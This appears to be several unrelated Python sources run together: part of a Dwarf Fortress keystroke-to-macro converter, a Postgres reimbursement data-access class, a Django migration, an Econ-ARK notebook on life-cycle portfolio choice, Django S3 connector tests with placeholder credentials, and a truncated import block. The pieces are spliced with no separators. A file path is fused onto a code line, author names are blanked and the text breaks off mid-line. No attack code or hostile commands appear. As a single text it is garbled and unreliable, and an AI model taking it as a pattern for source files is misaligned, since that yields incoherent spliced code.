self.grid.is_out_of_bounds(xt, yt): # just move there normally keys.extend(keycode * leftover) (x1, y1) = add_points((x1, y1), scale_point(move, steps)) # don't try to do this next iteration allow_overshoot = False else: # permit overjump/backtracking movement jumps += 1 (x1, y1) = add_points((x1, y1), scale_point(jumpmove, jumps)) allow_overshoot = True else: # move the last few cells needed when using # jumpmoves to land on the right spot keys.extend(keycode * leftover) # keys.append('%') (x1, y1) = add_points((x1, y1), scale_point(move, steps)) allow_overshoot = True if jumps > 0: keys.extend(jumpkeycode * jumps) return keys def setsize_standard(self, start, end): """ Standard sizing mechanism for dig, place, query buildtypes. 
Returns keys, newpos: keys needed to make the currently-designating area the correct size pos is where the cursor ends up after sizing the area """ return self.move(start, end), end def setsize_build(self, start, end): """ Standard sizing mechanism for the build buildtype. Returns keys, pos: keys needed to make the currently-designating area the correct size pos is where the cursor ends up after sizing the area """ # move cursor halfway to end from start mid = midpoint(start, end) keys = self.move(start, mid) # resize construction area = Area(start, end) keys += ['{widen}'] * (area.width() - 1) keys += ['{heighten}'] * (area.height() - 1) return keys, mid def setsize_fixed(self, start, end): """ Sizing mechanism for fixed size buildings like 3x3 workshops, 5x5 trade depots and 5x5 siege workshops. Here we just move to the center of the building and deploy it. This allows for e.g. a 3x3 grid of 'wc' cells indicating a single carpenter's workshop. Returns keys, pos: keys needed to make the currently-designating area the correct size pos is where the cursor ends up after sizing the area """ # move cursor halfway to end from start mid = midpoint(start, end) keys = self.move(start, mid) return keys, mid def setmats_build(self, areasize, manual_label): """ Returns keycodes needed to select materials for the given int areasize, and either generic material selection or manual(ly assisted) material selection. If manual_label is None, we prefix the "enter mats menu and wait" keycodes and postfix a "wait" to the keys needed to choose the mats. If manual_label is not None, we use {WaitAfterNext} and {SelectMat label count} keycodes for use by QFAHK for entering the material menu and doing manual material selection. """ # generic mat selection if manual_label is None: keys = ['&', '%'] # {Enter}{Wait} if areasize == 1: keys += ['@'] # shift-enter return keys # Tries to avoid running out of a given material type by blithely # attempting to all-select from DF's materials list repeatedly. # qfconvert will attempt this 1+sqrt(areasize) times, which should # be good enough most of the time. reps = 1 if areasize == 1 else 1 + 2 * int(sqrt(areasize)) keys += ['@', '{menudown}'] * (reps - 1) keys += ['%'] # {Wait} at the end return keys # Manually assisted material selection: enter materials menu and # wait for that region of the screen to change, then select manually # chosen material. return ['%>', '&', '{SelectMat %s %d}' % (manual_label, areasize)] def setmats_bridge(self, areasize, manual_label): """ Returns keycodes needed to select materials for the given int areasize; see setmats_build() for basic description. This method differs from setmats_build() in how it determines how many mat units are needed to build bridges, which use a formula of (areasize//4)+1 instead. """ return self.setmats_build(areasize / 4 + 1, manual_label) def convert_keys(keys, mode, title): """ Convert keycodes to desired output, based on mode. Returns string of all keystrokes or of DF macro-content. 
""" transmode = 'macro' if mode == 'macro' else 'key' keys = translate_keycodes(keys, transmode) if mode == 'macro': return '\n'.join(convert_to_macro(keys, title)) + '\n' elif mode == 'key': return ''.join(keys) elif mode == 'keylist': return ','.join(keys) raise KeystrokerError('Unknown Keystroker.render() mode "%s"' % mode) def translate_keycodes(keycodes, mode): """Translate keycodes based on given output mode.""" return util.flatten([translate_keycode(k, mode) for k in keycodes]) def translate_keycode(keycode, mode): """ Translate a given keycode against keylist and specified mode. Returns translation if one exists, or original keycode otherwise. """ translated = KEY_LIST[mode].get(keycode.lower()) if translated is None: return keycode # no translation available, so pass it through as is return translated # translation made def convert_to_macro(keycodes, title): """Convert keycodes to DF macro syntax (complete macro file contents).""" keybinds = parse_interface_txt( os.path.join(exetest.get_main_dir(), 'config/interface.txt')) if not title: # make up a macro title if one is not provided to us title = '~qf' + str(random.randrange(0, 999999999)) output = [title] # first line of macro is macro title for key in keycodes: if key == '': continue # empty keycode, output nothing elif keybinds.get(key) is None: raise KeystrokerError( "Key '%s' not bound in config/interface.txt" % key) if key == '^': output.append('\t\tLEAVESCREEN') # escape menu key else: output.extend(keybinds[key]) output.append('\tEnd of group') output.append('End of macro') return output def split_keystring_into_keycodes(keystring): """ Breaks str into individual keycodes. Returns a list of keycode strings. """ # prepare to break keystring into keycodes cmdedit = keystring # separate tokens with | chars... cmdedit = re.sub(r'\+\{Enter\}', '|@|', cmdedit) cmdedit = re.sub(r'\{', '|{', cmdedit) cmdedit = re.sub(r'\}', '}|', cmdedit) cmdedit = re.sub(r'\+\&', '|+&|', cmdedit) cmdedit = re.sub(r'\&', '|&|', cmdedit) cmdedit = re.sub(r'\^', '|^|', cmdedit) cmdedit = re.sub(r'\+(\w)', '|1:\\1|', cmdedit) cmdedit = re.sub(r'\!(\w)', '|4:\\1|', cmdedit) cmdedit = re.sub(r'\%wait\%', '|{wait}|', cmdedit) # support QF1.x's %wait% cmdsplit = re.split(r'\|+', cmdedit) # ...and split tokens at | chars. # break into individual keycodes codes = [] for k in cmdsplit: if not k: continue if k[0] == '{': # check for keycodes like {Right 5} match = re.match(r'\{(\w+|[&^+%!]) (\d+)\}', k) if match is None: codes.append(k) # preserve whole key-combos else: # repeat the specified keycode the specified number of times codes.extend(['{' + match.group(1) + '}'] * int(match.group(2))) continue if k[0:2] in ('1:', '4:'): codes.append(k) # preserve Alt/Shift combos as distinct keycodes continue if k[0] in ('&', '^', '+', '%', '!'): codes.append(k) # preserve these as distinct keycodes continue codes.extend(k) # just separate a series of individual keystrokes return codes def parse_interface_txt(path): """ Parse DF-syntax interface.txt. Returns a dictionary with keycodes as keys, whose values are lists of DF macro commands bound to each keycode in interface.txt. 
""" with open(path) as f: data = f.read() data = util.convert_line_endings(data) groups = [re.split('\n', kb) for kb in re.split(r'\[BIND:', data)] keybinds = copy(KEY_LIST) for kb in groups: if kb == ['']: continue bind = re.sub(r'(\w+):.+', r'\1', kb[0]) keys = [re.sub(r'\[(KEY:|SYM:)(.+?)\]', r'\2', k) for k in kb[1:]] for k in keys: if k == '': continue if keybinds.get(k) is None: keybinds[k] = [] keybinds[k].append('\t\t' + bind) return keybinds backend/daos/reimbursement_dao_postgres.py0 from typing import List from daos.reimbursement_dao import ReimbursementDAO from entities.reimbursement import Reimbursement from utils.connection_util import connection class ReimbursementDAOPostgres(ReimbursementDAO): def create_reimbursement(self, employee_id: int, amount: float, description: str) -> Reimbursement: sql = """insert into reimbursement values (default, %s, %s, %s, 'Pending', '') returning r_id""" cursor = connection.cursor() cursor.execute(sql, [str(employee_id), str(amount), str(description)]) connection.commit() r_id = cursor.fetchone()[0] reimbursement = Reimbursement(r_id, employee_id, amount, description, "Pending", "") return reimbursement def get_reimbursement_by_id(self, r_id: int) -> Reimbursement: sql = """select * from reimbursement where r_id = %s""" cursor = connection.cursor() cursor.execute(sql, [str(r_id)]) record = cursor.fetchall() for r_parts in record: output = Reimbursement(r_parts[0], r_parts[1], r_parts[2], r_parts[3], r_parts[4], r_parts[5]) return output def get_reimbursements_by_employee(self, employee_id: int) -> List[Reimbursement]: sql = """select * from reimbursement where employee_id = %s order by r_id""" cursor = connection.cursor() cursor.execute(sql, [str(employee_id)]) records = cursor.fetchall() r_list = [] for r_parts in records: reimbursement = Reimbursement(r_parts[0], r_parts[1], r_parts[2], r_parts[3], r_parts[4], r_parts[5]) r_list.append(reimbursement) return r_list def get_all_reimbursements(self) -> List[Reimbursement]: sql = """select * from reimbursement order by r_id""" cursor = connection.cursor() cursor.execute(sql) records = cursor.fetchall() r_list = [] for r_parts in records: reimbursement = Reimbursement(r_parts[0], r_parts[1], r_parts[2], r_parts[3], r_parts[4], r_parts[5]) r_list.append(reimbursement) return r_list def approve_reimbursement(self, reimbursement: Reimbursement, message: str) -> Reimbursement: sql = """update reimbursement set status = 'Approved', message = %s where r_id = %s returning employee_id""" cursor = connection.cursor() cursor.execute(sql, (str(message), str(reimbursement.r_id))) connection.commit() return Reimbursement(reimbursement.r_id, reimbursement.employee_id, reimbursement.amount, reimbursement.description, "Approved", message) def deny_reimbursement(self, reimbursement: Reimbursement, message: str) -> Reimbursement: sql = """update reimbursement set status = 'Denied', message = %s where r_id = %s returning employee_id""" cursor = connection.cursor() cursor.execute(sql, (str(message), str(reimbursement.r_id))) connection.commit() return Reimbursement(reimbursement.r_id, reimbursement.employee_id, reimbursement.amount, reimbursement.description, "Denied", message) __all__ = [ "_private_name", ] _private_name = "spam"# Generated by Django 2.0.1 on 2018-02-01 18:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('form', '0001_initial'), ] operations = [ migrations.AlterField( model_name='rating', name='why_realize', 
field=models.CharField(max_length=1000), ), ] # -*- coding: utf-8 -*- # --- # jupyter: # jupytext: # formats: ipynb,py:percent # notebook_metadata_filter: all # text_representation: # extension: .py # format_name: percent # format_version: '1.2' # jupytext_version: 1.2.3 # kernelspec: # display_name: Python 3 # language: python # name: python3 # language_info: # codemirror_mode: # name: ipython # version: 3 # file_extension: .py # mimetype: text/x-python # name: python # nbconvert_exporter: python # pygments_lexer: ipython3 # version: 3.7.6 # latex_envs: # LaTeX_envs_menu_present: true # autoclose: false # autocomplete: false # bibliofile: biblio.bib # cite_by: apalike # current_citInitial: 1 # eqLabelWithNumbers: true # eqNumInitial: 1 # hotkeys: # equation: Ctrl-E # itemize: Ctrl-I # labels_anchors: false # latex_user_defs: false # report_style_numbering: false # user_envs_cfg: false # --- # %% [markdown] # # Optimal Financial Investment over the Life Cycle # # # # [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/econ-ark/REMARK/master?filepath=REMARKs%2FPortfolioChoiceBlogPost%2FPortfolioChoiceBlogPost.ipynb) # # Economists like to compare actual human behavior to choices that would be made by a "rational" agent who optimally takes into account all the complexities of a decision. # # But for some problems, calculating the optimal choice is remarkably difficult. # # Financial decisions over a lifetime are such a problem. Determining the optimal amount to save for retirement, and how much of your savings to invest in risky assets (like stocks) versus safe assets (like a bank account), turns out to be mathematically **much** harder than calculating how to land the Apollo spacecraft on the moon. In fact, the computational tools that economists use to solve such problems descend directly from those originally developed to optimize Apollo trajectories -- with 50 years of further development. # # By 2005, those tools were finally good enough to give financial advice that deserved to be taken seriously -- if by "taken seriously" we mean that economists's own personal decisions (and the advice they give to friends and family) were influenced by the results. (A 2005 academic paper by [, and Maenhout](https://doi.org/10.1093/rfs/hhi017) is the standard reference.) # # But even today, these tools are not widely used, because it can take years of study to master them. # # In 2015, the U.S. [Consumer Financial Protection Bureau](https://www.consumerfinance.gov) funded the creation of the [Econ-ARK](https://econ-ark.org) open source software project, whose purpose is to make such tools much more accessible, both to scholars and to the wider public. Thanks to subsequent [funding by the Sloan Foundation](https://sloan.org) and the [Think Forward Initiative](https://www.thinkforwardinitiative.com), the Econ-ARK team is proud to announce our newest enhancement: [The `ConsPortfolioModel` tool](https://hark.readthedocs.io/en/latest/example_notebooks/ConsPortfolioModel.html) calculates the optimal solution to a lifetime optimal saving problem where the consumer can choose how much to invest in risky versus safe assets. # # Our hope is that such transparent and publicly available tools will eventually provide an alternative to the proprietary (and mysterious) advice that has become widely available from "robo advisors" in the last few years (and the even more mysterious advice that has been available from human advisors much longer). 
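# %% [markdown]
# A minimal sketch of how one might call the tool is shown below. It is illustrative only: it assumes the `HARK` package is installed and that the names `PortfolioConsumerType`, `init_portfolio`, and `ShareFuncAdj` still refer to the consumer class, the baseline parameter dictionary, and the solved risky-share policy (check the `ConsPortfolioModel` documentation linked above before relying on them), and it uses the package's baseline calibration rather than the full life-cycle calibration behind the figures in this post.

# %%
# Hedged usage sketch for HARK's ConsPortfolioModel (assumed API names).
from copy import deepcopy

from HARK.ConsumptionSaving.ConsPortfolioModel import (
    PortfolioConsumerType,
    init_portfolio,
)

params = deepcopy(init_portfolio)
params["CRRA"] = 3.0  # relative risk aversion, as in Figure 1 below

agent = PortfolioConsumerType(**params)
agent.solve()  # backward induction gives period-by-period policy functions

# Each period's solution maps normalized market resources m to the optimal
# share of savings held in the risky asset (when the portfolio can be adjusted).
print(agent.solution[0].ShareFuncAdj(5.0))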
# %% [markdown] # ## The Problem # # Nobody saving for retirement knows what the future holds. They are likely to change jobs several times during their career, and each new job will have a different profile of income growth and risk; they might develop health problems that cut life short before they reach retirement (so retirement savings would be unnecessary), or they might turn out to be so healthy that they live to 100 (with a danger of outliving their savings). # # Nor does anybody know what the payoffs will be for alternative investment choices. "Risky" assets like stocks have historically earned higher returns than "safe" assets like government bonds -- but there is no guarantee that stocks will outperform bonds over any particular period (like, until you retire). # # Uncertainties like this are why the consumer's problem is so much harder than NASA's. The motion of a spacecraft is predictable: If you point it in a certain direction with a certain velocity, Newton's equations can tell you where it will be far into the future. In contrast, "optimal" behavior over a life that is subject to many risks must prudently take into account all of the possible outcomes. # # "Big data" now allows us to quantify the risks associated with earnings from work: We can measure how often people change jobs at each age (taking into account education, occupation and so on), and we can measure what happens to income after job changes. Job-related income uncertainty can therefore be represented mathematically as a statistical distribution over the many possible future outcomes, and similarly for other kinds of risk (like health risk). When all the biggest individual risks have been quantified, we can calculate the joint probabilities of every conceivable draw, and weight each possible outcome by its probability and its desirability. Finally, we can calculate how the ultimate outcomes (like retirement income) depend probabilistically on the current saving and portfolio choices, and determine which choices would be "optimal" (in the sense of being the best available gamble) for consumers with different preferences (toward risk, for example). # # %% [markdown] # ## The Solution # # ### Replicating the Standard Model # # Our first use of `ConsPortfolioModel` has been to replicate the results of the above-mentioned 2005 paper (by , and Maenhout - "CGM" for short). # # A key input is the degree of consumers' ["risk aversion."](https://en.wikipedia.org/wiki/Risk_aversion) Researchers have found that many kinds of consumer behavior are consistent with values of ["relative risk aversion"](https://en.wikipedia.org/wiki/Risk_aversion#Relative_risk_aversion) in the range from 2 to 4. # # The most striking conclusion of the CGM paper is captured in the figure below. We assume that consumers with risk aversion of 3 can choose between a "risky" asset with expected performance (for risk and return) like the stock market, versus a "safe" asset with lower expected returns historically typical of safe assets. The figure shows, by age, the optimal risky share -- that is, the proportion of savings that it is optimal to invest in the "risky" asset. The fact that the proportion is stuck at 1.0 at every age means that the computer says the optimal choice is always to invest 100 percent of your savings in stocks!
# Figure 1: Portfolio Choice for Moderately Risk Averse Consumer
# # # # %% [markdown] # Of course, what you believe about your optimal portfolio share in the risky asset depends on your _perception_ of the degree of riskiness and your _beliefs_ about the average extra return stocks will yield over the long run (the "equity premium"). # # The model assumes that people expect an equity premium of 4 percent, which is [a good estimate](http://breesefine7110.tulane.edu/wp-content/uploads/sites/110/2015/10/Perspectives-on-the-Equity-Risk-Premium-Siegel.pdf) of what the average premium has been on stock market investments in the developed world over the past century. (Risk is also assumed to match the historical average.) # # The model's conclusion is that for values of risk aversion that accurately capture people's risk-related choices in other contexts, an equity premium of 4 percent is more than enough to compensate any rational agent for bearing the risk that has typically been associated with stock returns. # %% [markdown] # ## Maybe Risk Aversion is Much Greater than 3? # # Parameters like "relative risk aversion" are slippery things to measure. Maybe the conventional choice of around 3, which works well to explain other choices, is inappropriate here -- maybe people just hate stock market risk much more than other kinds of risk that would have similar financial consequences. # # The next figure shows the profile of the mean risky share for a consumer with risk aversion of 6, twice the conventional value. (Such a prudent person would be like your most risk averse neighbor or relative). # # Even with such high risk aversion, the model says that until about age 35 it is still optimal to invest all of your savings in the stock market. After that, the risky share declines gradually until it stabilizes at around 65 percent at age 65. (The dashing lines show the choices made by people at the 5th and 95th percentiles of the distribution of the risky share). # # These results reflect two aspects of the model: # 1. Young people start with little or no assets # * Their income comes mostly from working in the labor market # * If you have only a small amount of wealth, the absolute dollar size of the risk you are taking by investing your (modest) retirement savings in the stock market is small, so the higher expected returns more than make up for the (small) risk # 1. By the age of retirement, you plan to finance a lot of your future spending from your savings # * So, investing everything in the stock market would put a large proportion of your retirement spending at risk # * The "equity premium" is nevertheless large enough to make it worthwhile for most people to keep half or more of their assets in stocks # # #
#
# Figure 2: Portfolio Choice for Highly Risk Averse Consumer
#
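# %% [markdown]
# The two points above can be illustrated with a rough back-of-the-envelope calculation (an illustration only -- this is not how the model is actually solved). A classic benchmark (the Merton-Samuelson portfolio share) says that the optimal share of *total* wealth to hold in risky assets is roughly the equity premium divided by (risk aversion times the variance of risky returns), where total wealth includes the value of future labor income ("human wealth"). Because the young hold almost all of their wealth in human form, hitting that target with their small financial savings means putting all of those savings in stocks; as financial wealth grows relative to human wealth, the implied share of financial wealth falls. The numbers below (a 4 percent premium and a 20 percent standard deviation of returns) are assumptions for illustration, not the calibration behind the figures.

# %%
equity_premium = 0.04  # assumed expected excess return on stocks
sigma = 0.20           # assumed std. dev. of stock returns
crra = 6.0             # the high risk aversion used in Figure 2

# Benchmark share of TOTAL wealth (financial + human) in risky assets
share_of_total = equity_premium / (crra * sigma**2)

# If stocks can only be held within financial wealth, the implied share of
# FINANCIAL wealth is larger the smaller financial wealth is relative to
# total wealth -- which is why the young go "all in".
for fin_frac in (0.05, 0.25, 0.50, 0.75):  # financial wealth / total wealth
    share_fin = min(1.0, share_of_total / fin_frac)
    print(f"financial wealth = {fin_frac:4.0%} of total wealth "
          f"-> risky share of financial wealth = {share_fin:.0%}")

# %% [markdown]
# The life-cycle model's answer differs from this benchmark because labor income is risky and cannot be sold or borrowed against, but the qualitative pattern -- a risky share near 100 percent when young, declining as retirement savings accumulate -- is the same.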
# %% [markdown]
# ## What Do People Actually Do?
#
# The pattern above is strikingly different from the actual choices that typical savers make.
#
# The figure below shows data, from the Federal Reserve's triennial [_Survey of Consumer Finances_](https://en.wikipedia.org/wiki/Survey_of_Consumer_Finances), on the proportion of their assets that people at different ages actually have invested in stocks and other risky assets, taken from [this article](https://www.stlouisfed.org/publications/regional-economist/fourth-quarter-2018/role-age-investment-mix).
#
# The risky share that people choose in real life is much lower than the model says is optimal (even with extreme risk aversion of 6).
#
# Below we examine two possible interpretations:
# 1. The model is basically the right framework for thinking about these questions
#    * But some of its assumptions/calibrations are wrong
# 1. People _are_ behaving optimally, but the model is still missing some important features of reality
#
# Figure: Risky portfolio share by age in the Survey of Consumer Finances
#
# %% [markdown]
# ### What Assumptions Might Be Wrong?
#
# %% [markdown]
# #### Maybe People Are Pessimistic About the Equity Premium
#
# While [4 percent is a reasonable estimate of what the equity premium has been in the past](http://www.globalfinancialdata.com/the-equity-risk-premium/), it is possible that most people do not _expect_ such a high equity premium (and never have expected it).
#
# The figure below shows the consequences if highly risk averse people believe the equity premium will be only two percent (which is around its historical average in the U.S. before 1941, and which [some respected economists](https://jpm.pm-research.com/content/26/1/10.abstract) think might prevail in the future).
#
# The shape of the figure is much the same as before; in particular, the youngest people still hold 100 percent of their portfolios in risky assets. But the proportion of their portfolios that middle-aged and older people hold in stocks falls from about 50 to about 20 percent.
#
#
# Figure 3: Pessimistic and Highly Risk Averse Consumer
#
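# %% [markdown]
# In the toolkit, this experiment amounts to lowering the expected return on the risky asset and re-solving. The sketch below continues the earlier one; `RiskyAvg` is assumed (from memory of the HARK documentation) to be the mean gross return on the risky asset, so subtracting 0.02 shrinks the perceived equity premium by roughly two percentage points.

# %%
from HARK.ConsumptionSaving.ConsPortfolioModel import (
    PortfolioConsumerType,
    init_portfolio,
)

pessimistic = init_portfolio.copy()
pessimistic["CRRA"] = 6.0                                 # highly risk averse
pessimistic["RiskyAvg"] = pessimistic["RiskyAvg"] - 0.02  # dimmer view of stocks

pessimist = PortfolioConsumerType(**pessimistic)
pessimist.solve()

# Optimal risky share at a moderate level of normalized market resources
share_func = pessimist.solution[0].ShareFuncAdj
print(f"optimal risky share at m = 5: {float(share_func(5.0)):.2f}")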
# %% [markdown]
# #### Is Pessimism Enough?
#
# The preceding figure assumes that relative risk aversion is very high (6). A natural question is whether, when people are pessimistic about the equity premium, their optimal portfolio shares might be low even at a less extreme degree of risk aversion.
#
# Nope. The figure below shows that, even with pessimistic beliefs about the equity premium, if relative risk aversion has a conventional value of 3 then the optimal risky share is still 100 percent for both young and old people, and on average reaches a low point of about 90 percent for people nearing retirement.
#
#
# Figure 4: Pessimistic and Moderately Risk Averse Consumer
#
# # # %% [markdown] # ### Comparison to Professional Advice # %% [markdown] # Investment advisors sometimes advocate the "100 minus age" rule, which says that the percentage of your portfolio in risky assets should be equal to 100 minus your age; so, a 60 year old would have 40 percent in stocks. # # For people before retirement, the rule's recommendation is somewhat not too different from the shape that comes out of the model (assuming high risk aversion). While the rule would say that the 25 year old should put 75 percent of their savings in the stock market and the model says 100 percent, they agree that the young person's proportion should be high, and also agree that the proportion should decline during working life. # # But the rule and the model disagree about what should happen after retirement. The rule recommends steadily reducing your exposure to risky assets as you get older, while the model says that after retirement your exposure should remain at about the same level as late in your working life. # # Financial advisors, who have daily contact with real human beings, may have an insight that the model does not incorporate: Perhaps risk aversion increases with age. # # Risk aversion is remarkably difficult to measure, and economists' efforts to determine whether it increases with age have been inconclusive, with some studies finding [evidence for an increase](https://voxeu.org/article/effect-age-willingness-take-risks) (at least during working life) and others finding [little increase](https://onlinelibrary.wiley.com/doi/abs/10.1016/j.rfe.2003.09.010). # # For technical reasons, it is somewhat difficult to model risk aversion that varies directly with age. But your willingness to invest in risky assets depends on both your degree of aversion to risk and your perception of the size of the risk. So a backdoor way to examine the consequences of rising risk aversion with age is to assume that the perceived riskiness of stock investments goes up with age. # # That is what is done in the figure below: We assume that the perceived riskiness of stock market investment doubles between age 65 and age 100. The result now looks more like the advice of financial advisors: Increasing _perceived_ risk as you get older persuades you to invest less in risky assets. # # This figure suggests that the "100 minus age" rule is not too bad as an approximation of what an extremely risk averse person might want to do -- if they become more and more fearful of risk after retirement. # #
#
# Figure 5: 100 Minus Age Rule vs Optimizing Highly Risk Averse Consumer
#
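# %% [markdown]
# For concreteness, here is the "100 minus age" rule as code, side by side with the rounded model numbers quoted in the text for the highly risk averse consumer (the "model" values below are just those quoted figures, not fresh output from the toolkit).

# %%
def hundred_minus_age_share(age):
    """Risky share recommended by the '100 minus age' rule, as a fraction."""
    return max(0, min(100, 100 - age)) / 100


# Rounded values from the text: about 100 percent when young, stabilizing
# around 65 percent at age 65 and staying there after retirement.
stylized_model_share = {25: 1.00, 65: 0.65, 80: 0.65}

for age, model_share in stylized_model_share.items():
    rule_share = hundred_minus_age_share(age)
    print(f"age {age}: rule = {rule_share:.0%}, model (approx.) = {model_share:.0%}")

# %% [markdown]
# The two prescriptions agree before retirement and part ways after it -- which is exactly the gap that the rising-perceived-risk experiment in Figure 5 closes.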
# # # %% [markdown] # ### Other Experiments # # Many other experiments are possible in the framework (as you can discover yourself by downloading the tool; see below), but the conclusion is always the same: Even if people expect that stock returns in the future will be substantially lower than they have been in the past, for most people most of the time, the return on stock market investments more than compensates for any reasonable degree of risk aversion. # %% [markdown] # #### What Might Still Be Missing # # Some experiments are NOT yet possible with our toolkit. Perhaps the most important is that we have no way to take into account the risks entailed in homeownership. Houses, like stocks, are assets whose price can go up or down. Since housing wealth constitutes the majority of the wealth of most consumers, the model's failure to take into account the effects that homeownership should have on the optimal choice of risky investment in other (non-housing) forms is a serious enough failing to call into question the soundness of its conclusions. # # The Think Forward Initiative grant that funded this work has a second component: The addition of a realistic treatment of the effects of home ownership on the optimal share of financial investment in risky assets. This is a question that is at the frontier of what is possible using the kinds of tools we are developing. We are interested to see whether a proper treatment of homeownership will be enough to temper the recommendations of the model to invest heavily in other risky assets. The answer is not clear -- which is why we need a model! # %% [markdown] # #### Code # # The computer code to reproduce all of the figures in this notebook, and a great many others, can be executed by [installing](https://github.com/econ-ark/HARK/#install) the [Econ-ARK toolkit](https://github.com/econ-ark/HARK/#readme) and cloning the [REMARK](https://github.com/econ-ark/REMARK) repository. The small unix program `do_all_code.sh` at the root level of the [REMARKs/PortfolioChoiceBlogPost](https://github.com/econ-ark/REMARK/blob/master/REMARKs/PortfolioChoiceBlogPost/do_all_code.sh) directory produces everything. # # A replication of main results of the CGM paper is referenced in a link below. # # The [Econ-ARK](https://github.com/econ-ark) toolkit is available at GitHub, and [the `ConsPortfolioModel`](https://github.com/econ-ark/HARK/blob/master/HARK/ConsumptionSaving/ConsPortfolioModel.py) is [documented here](https://hark.readthedocs.io/en/latest/example_notebooks/ConsPortfolioModel.html). # %% [markdown] # #### References # # ., ., & . (2005). Consumption and portfolio choice over the life cycle. The Review of Financial Studies, 18(2), 491-533. [doi.org/10.1093/rfs/hhi017](https://doi.org/10.1093/rfs/hhi017) # # Velásquez-Giraldo, Mateo and . Replication of Cocco, Gomes, and Maenhout (2005). 
[REMARK](https://github.com/econ-ark/REMARK/blob/master/REMARKs/CGMPortfolio/Code/Python/CGMPortfolio.ipynb) from unittest import skip import boto3 from django import test from django.core.exceptions import ValidationError from django.urls import reverse from moto import mock_s3, mock_sts from hexa.catalog.models import Index from hexa.plugins.connector_s3.models import ( Bucket, BucketPermission, BucketPermissionMode, Credentials, Object, ) from hexa.user_management.models import Membership, Team, User class ConnectorS3Test(test.TestCase): @classmethod def setUpTestData(cls): cls.team = Team.objects.create(name="Test Team") cls.user_jim = User.objects.create_user( "", "regular", is_superuser=True, ) Membership.objects.create(team=cls.team, user=cls.user_jim) cls.api_credentials = Credentials.objects.create( username="app-iam-username", access_key_id="FOO", secret_access_key="BAR", default_region="us-west-2", user_arn="test-user-arn-arn-arn", app_role_arn="test-app-arn-arn-arn", ) cls.bucket = Bucket.objects.create(name="test-bucket") BucketPermission.objects.create(team=cls.team, bucket=cls.bucket) @skip("Deactivated for now - mocks needed") def test_credentials_200(self): self.client.login(email="", password="") response = self.client.post(reverse("notebooks:credentials")) self.assertEqual(response.status_code, 200) response_data = response.json() self.assertIn("username", response_data) self.assertEqual("", response_data["username"]) self.assertIn("env", response_data) self.assertEqual( { "S3_TEST_bucket_bucket_NAME": "test-bucket", "S3_TEST_bucket_ACCESS_KEY_ID": "FOO", "S3_TEST_bucket_SECRET_ACCESS_KEY": "BAR", }, response_data["env"], ) def test_bucket_delete(self): """Deleting a bucket should delete its index as well""" bucket = Bucket.objects.create(name="some-bucket") bucket_id = bucket.id self.assertEqual(1, Index.objects.filter(object_id=bucket_id).count()) bucket.delete() self.assertEqual(0, Index.objects.filter(object_id=bucket_id).count()) @mock_s3 @mock_sts def test_bucket_clean_ok(self): s3_client = boto3.client("s3", region_name="us-east-1") s3_client.create_bucket(Bucket="some-bucket") bucket = Bucket.objects.create(name="some-bucket") self.assertIsNone(bucket.clean()) @mock_s3 @mock_sts def test_bucket_clean_ko(self): s3_client = boto3.client("s3", region_name="us-east-1") s3_client.create_bucket(Bucket="some-bucket") bucket = Bucket.objects.create(name="huh-wrong-bucket-name") with self.assertRaises(ValidationError): bucket.clean() class PermissionTest(test.TestCase): @classmethod def setUpTestData(cls): cls.BUCKET1 = Bucket.objects.create(name="aws_bucket1") cls.BUCKET2 = Bucket.objects.create(name="aws_bucket2") cls.TEAM1 = Team.objects.create(name="Test Team1") cls.TEAM2 = Team.objects.create(name="Test Team2") BucketPermission.objects.create(bucket=cls.BUCKET1, team=cls.TEAM1) BucketPermission.objects.create(bucket=cls.BUCKET1, team=cls.TEAM2) cls.USER_REGULAR = User.objects.create_user( "", "regular", ) Membership.objects.create(team=cls.TEAM1, user=cls.USER_REGULAR) Membership.objects.create(team=cls.TEAM2, user=cls.USER_REGULAR) cls.USER_SUPER = User.objects.create_user( "", "super", is_superuser=True, ) for bucket in [cls.BUCKET1, cls.BUCKET2]: for i in range(2): Object.objects.create( bucket=bucket, key=f"object-{bucket.name}-{i}", size=100 ) def test_bucket_dedup(self): """ - user super see 2 buckets (all of them) - user regular see only bucket 1, one time """ self.assertEqual( list( Bucket.objects.filter_for_user(self.USER_REGULAR) .order_by("name") 
.values("name") ), [{"name": "aws_bucket1"}], ) self.assertEqual( list( Bucket.objects.filter_for_user(self.USER_SUPER) .order_by("name") .values("name") ), [{"name": "aws_bucket1"}, {"name": "aws_bucket2"}], ) def test_objects_dedup(self): """ regular user can see 2 objects super user can see 4 objects """ self.assertEqual( list( Object.objects.filter_for_user(self.USER_REGULAR) .order_by("key") .values("key") ), [{"key": "object-aws_bucket1-0"}, {"key": "object-aws_bucket1-1"}], ) self.assertEqual( list( Object.objects.filter_for_user(self.USER_SUPER) .order_by("key") .values("key") ), [ {"key": "object-aws_bucket1-0"}, {"key": "object-aws_bucket1-1"}, {"key": "object-aws_bucket2-0"}, {"key": "object-aws_bucket2-1"}, ], ) class PermissionTestWritableBy(test.TestCase): @classmethod def setUpTestData(cls): cls.BUCKET1 = Bucket.objects.create(name="aws_bucket1") cls.BUCKET2 = Bucket.objects.create(name="aws_bucket2") cls.TEAM1 = Team.objects.create(name="Test Team1") cls.TEAM2 = Team.objects.create(name="Test Team2") BucketPermission.objects.create( bucket=cls.BUCKET1, team=cls.TEAM1, mode=BucketPermissionMode.READ_ONLY ) BucketPermission.objects.create( bucket=cls.BUCKET2, team=cls.TEAM1, mode=BucketPermissionMode.READ_ONLY ) BucketPermission.objects.create(bucket=cls.BUCKET1, team=cls.TEAM2) cls.USER_REGULAR = User.objects.create_user( "", "regular", ) Membership.objects.create(team=cls.TEAM1, user=cls.USER_REGULAR) Membership.objects.create(team=cls.TEAM2, user=cls.USER_REGULAR) cls.USER_SUPER = User.objects.create_user( "", "super", is_superuser=True, ) def test_bucket_writable(self): """ - user super can write in bucket 1 and 2 - user regular can write in bucket 1 (only one RO flag, RW flag via team 2 supersede) - user regular can't write in bucket 2 """ self.assertTrue(self.BUCKET1.writable_by(self.USER_SUPER)) self.assertTrue(self.BUCKET2.writable_by(self.USER_SUPER)) self.assertTrue(self.BUCKET1.writable_by(self.USER_REGULAR)) self.assertFalse(self.BUCKET2.writable_by(self.USER_REGULAR)) from django.contrib import admin from .models import Activity, GitRepo, GitCommit admin.site.register(Activity) admin.site.register(GitRepo) admin.site.register(GitCommit) import argparse import os import logging import pandas as pd from tqdm import tqdm from brainio import brainio from imlib.IO.cells import get_cells from imlib.pandas.misc import sanitise_df from imlib.image.metadata import define_pixel_sizes from imlib.general.config import get_config_obj from imlib.source.source_files import 